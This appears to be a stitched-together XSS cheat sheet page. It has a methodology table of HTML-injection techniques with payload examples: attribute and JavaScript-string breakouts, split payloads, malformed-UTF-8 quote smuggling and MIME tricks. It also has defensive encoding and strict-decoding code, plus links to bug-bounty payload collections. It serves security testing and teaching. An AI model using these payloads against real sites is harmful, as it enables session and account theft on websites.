This cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters. XSS Payload Cheat Sheet. Contribute to rootbakar/XSS-Payload development by creating an account on GitHub. XSSCheatSheet2020Edition: Introduction. The best collection of XSS fuzzing payloads for white-hat bug bounty platforms, 2020 edition. This cheat sheet is intended for bug hunters, security analysts and penetration testers: test the different payloads against the application at hand, observe the response content, and look for cross-site scripting vulnerabilities in the web application. It contains 100+ XSS testing tips in total.

  1. XSS Payload Cheat Sheet 2020

The Book takes care to explain why it elevates Cross-Site Scripting (XSS) to the broader title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.

In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop that locks the browser, e.g. while(1){a=1;}, to something more useful that a creative attacker comes up with. You can easily find "XSS Cheat Sheets" elsewhere; the intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn to the list of complex attacks on a cheat sheet.


Also notice how the syntax of elements and JavaScript has been preserved in cases where a single or double quote is used to prefix a payload. The injected quote prematurely ends a quoted string, which leaves a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by appending an extra variable definition with an open quote:

;a='

The dangling quote then closes that delimiter and, in most cases, the syntax is preserved. This kind of closure isn't strictly necessary for an exploit to work, but it is the mark of craftier exploits.
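The defensive counterpart of the reflection points discussed above (a quoted attribute value and a double-quoted JavaScript string, plus plain element text) is an encoder chosen per context. The following is an added example, not code from the original post; the render functions, the delimiter-counting check and the PAYLOADS constants are assumptions built from the post's own templates, with a=1 standing in for the biohazard symbol.

```javascript
// Added example (not code from the original post): output encoders for the
// reflection contexts discussed above (element text, quoted attribute value,
// double-quoted JavaScript string), applied to the post's own templates.

function encodeHtmlText(s) {          // element text: '<' must not open a tag
  return s.replace(/[&<>]/g, (c) => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;' }[c]));
}

function encodeHtmlAttr(s) {          // quoted attribute: quotes must not close it
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' }[c]));
}

// JS string literal: escape every non-alphanumeric char as \xHH / \uHHHH so
// neither a quote nor "</script>" can end the string or the script element.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const h = c.charCodeAt(0).toString(16);
    return h.length <= 2 ? '\\x' + h.padStart(2, '0') : '\\u' + h.padStart(4, '0');
  });
}

// The post's templates, rendered unsafely (as in the injection examples) and
// with the encoder that matches each reflection context.
function renderInputUnsafe(v) { return '<input type=text name=id value="' + v + '">'; }
function renderInput(v)       { return '<input type=text name=id value="' + encodeHtmlAttr(v) + '">'; }
function renderLink(url)      { return '<a href="/redir?url=' + encodeHtmlAttr(url) + '">'; }
function renderLastLink(ref)  { return 'var lastLink = "' + encodeJsString(ref) + '";'; }

// Structural check: the template contributed exactly one '<' (HTML cases) and
// two '"' delimiters; any extra ones mean the value escaped its context.
function delimiterCounts(out) {
  return { lt: (out.match(/</g) || []).length, dq: (out.match(/"/g) || []).length };
}

// Constructed sample payloads taken from the post, a=1 replacing the biohazard symbol.
const PAYLOADS = {
  closeTag: '><script>a=1</script>',
  attrEvent: '" onClick=a=1;a="',
  jsString: '";{a=1}var foo="',
  split: '"<script<!--',
};
```

Run the unsafe and safe renderers over the same payload and compare delimiterCounts: the unsafe input template ends up with three tags, the encoded one with the single tag it started with.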

The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.


Each row of the table is given below with its four columns: Technique, Characters, Payload Example, Injection Example.

Technique: Close a start tag in order to insert a new element
(This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.)
Characters: >  />  -->  ]]>
Payload Example: ><script>☣</script>
Injection Example: <input type=text name=id value=><script>☣</script>>
(The trailing > is the original input tag's own closing bracket, left dangling after the injected element.)

Technique: Insert an end tag in order to insert a new element
(Also useful where XML appears, such as RSS feeds.)
Characters: </element>  ]]>
Payload Example: ]]><script>☣</script>
Injection Example: <INFO><![CDATA[]]><script>☣</script>

Technique: Close a quoted attribute in order to insert an intrinsic event
Characters: " (ASCII 0x22)  ' (ASCII 0x27)
Payload Example: "onEvent=☣;a="
Injection Example: <a href="/redir?url=http://" onClick=☣;a="">

Technique: Break out of a JavaScript variable
Characters: " (ASCII 0x22)  ' (ASCII 0x27)
Payload Example: ";{☣}var foo="
Injection Example:
<script>
var host = window.location;
var lastLink = "http://web.site/index?refurl=";{☣}var foo="";
</script>

Technique: Split payload across multiple reflection points
(Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.)
Characters: (as above)
Payload Example: 1: "<script<!--   2: -->>☣</script>
Injection Example: <input value=""<script<!-- ">other content <input value=" -->>☣</script>

Technique: Alter MIME interpretation of an uploaded file
(Usually when content is expected to be served as text/plain, binary, or another non-HTML type)
Characters: Must be able to influence the Content-Type header or the browser's MIME sniffing algorithm
Payload Example: text/html  application/x-javascript
Injection Example: Uploaded file contains JavaScript. Image EXIF data contains HTML & JavaScript.

Technique: Bypass a filter using a browser quirk
Characters: Alternate whitespace character  Non-standard element or attribute
Payload / Injection Example: See http://x86.cx/html5/ for an example of a complex src attribute for an img element.

Technique: Bypass a filter using alternate or invalid character encoding
(The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This happens either because a server-side filter incorrectly stripped or rewrote the invalid sequence, or because the browser's character parser misinterpreted the sequence.)
Characters: UTF-7  UTF-8  Unicode
Payload Example: %fe%22  %fd%22  %cd%22  %c1%22  %c0%a2  %80%22  %22

Technique: JavaScript execution in CSS and style definitions
[Obsolete for modern browsers due to security concerns]
Characters: IE Expressions  Mozilla -moz-binding
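The invalid-encoding row above depends on a decoder that accepts ill-formed UTF-8 (C0 A2 is an overlong encoding of 0x22, and 80 or FE followed by 22 can swallow the quote as a continuation byte). This added example, not code from the original post, puts a deliberately lenient decoder that reproduces that behaviour next to a strict one that rejects it; percentToBytes, decodeLenient and decodeStrict are assumed helper names, and the inputs are the row's own percent-encoded sequences.

```javascript
// Added example (not code from the original post): a lenient UTF-8 decoder
// that reproduces the failure the row above describes, and a strict decoder
// that rejects overlong and ill-formed sequences outright.

function percentToBytes(s) {           // "%c0%a2" -> [0xc0, 0xa2]; other chars pass through
  const out = [];
  for (let i = 0; i < s.length; i++) {
    const hex = s[i] === '%' ? s.substr(i + 1, 2) : '';
    if (/^[0-9a-f]{2}$/i.test(hex)) { out.push(parseInt(hex, 16)); i += 2; }
    else out.push(s.charCodeAt(i) & 0xff);
  }
  return out;
}

// Lenient: trusts the lead byte's length and masks whatever follows, so an
// overlong C0 A2 decodes to '"' and a bogus lead byte swallows a following 22.
function decodeLenient(bytes) {
  let s = '';
  for (let i = 0; i < bytes.length;) {
    const b = bytes[i];
    const n = b < 0x80 ? 1 : b >= 0xf0 ? 4 : b >= 0xe0 ? 3 : 2;
    let cp = n === 1 ? b : b & (0xff >> (n + 1));
    for (let j = 1; j < n && i + j < bytes.length; j++) cp = (cp << 6) | (bytes[i + j] & 0x3f);
    s += String.fromCodePoint(Math.min(cp, 0x10ffff)); i += n;
  }
  return s;
}

// Strict: valid lead bytes only, real continuation bytes only, no overlong
// forms, no surrogates, nothing above U+10FFFF. Returns null on any violation.
function decodeStrict(bytes) {
  let s = '';
  for (let i = 0; i < bytes.length;) {
    const b = bytes[i];
    let n, min;
    if (b < 0x80) { n = 1; min = 0; }
    else if (b >= 0xc2 && b <= 0xdf) { n = 2; min = 0x80; }
    else if (b >= 0xe0 && b <= 0xef) { n = 3; min = 0x800; }
    else if (b >= 0xf0 && b <= 0xf4) { n = 4; min = 0x10000; }
    else return null;                  // 80-C1 and F5-FF can never start a sequence
    if (i + n > bytes.length) return null;
    let cp = n === 1 ? b : b & (0xff >> (n + 1));
    for (let j = 1; j < n; j++) {
      if ((bytes[i + j] & 0xc0) !== 0x80) return null;
      cp = (cp << 6) | (bytes[i + j] & 0x3f);
    }
    if (cp < min || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff)) return null;
    s += String.fromCodePoint(cp); i += n;
  }
  return s;
}
```

A filter that scans the raw bytes for 0x22 passes %c0%a2 untouched; decodeLenient then yields the quote while decodeStrict returns null, which is the behaviour to insist on at every decoding step before a filter runs.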
🔥Complete Bug Bounty Cheat Sheet🔥
XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list
SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md
SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection
CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection
Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md
Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md
RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md
Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md
Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md
Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md
LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection
NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection
GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection
IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References
ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management
LaTeX Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth
XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection
Upload Bypass Tricks
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files
BURP
https://drive.google.com/file/d/1r1LGt7fEh8AuhihrBfp1GGmU9ttV9CkP/view?usp=sharing
https://drive.google.com/file/d/1IOgrVUIQb9HGQG9tePe3v_w2gyaymUFq/view?usp=sharing